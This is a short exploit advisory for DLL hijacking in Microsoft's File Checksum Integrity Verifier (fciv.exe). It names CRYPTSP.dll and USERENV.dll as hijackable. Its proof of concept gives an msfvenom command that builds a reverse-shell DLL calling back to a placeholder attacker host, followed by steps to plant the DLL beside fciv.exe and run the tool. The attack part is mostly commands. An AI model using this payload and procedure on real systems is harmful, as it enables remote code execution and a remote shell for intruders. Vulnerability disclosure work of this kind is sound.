Microsoft File CheckSum DLL hijacking Attack

file checsum with a process fciv.exe will load and execute malicious Dynamic Link Libraries {DLL} while using the following vulnerable names :

CRYPTSP.dll
USERENV.dll

the process of exploitation occurs while placing these remade dll files in the same directory of FCIV .

so if an attacker is able to place one of these Vulnerable DLL , the execution of file verification will load these malicious dll directly .

POC

  • Generate reverse shell tcp payload using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll
  • Place DLL file on the same directory of fciv executable

  • execute fciv.exe with malicious dll file

fciv.exe CRYPTSP.dll

Reference

http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt